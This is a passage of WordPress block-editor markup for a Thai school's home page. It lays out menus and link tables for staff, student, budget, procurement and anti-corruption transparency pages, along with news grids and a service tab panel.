data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1704\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1754\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1697\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list 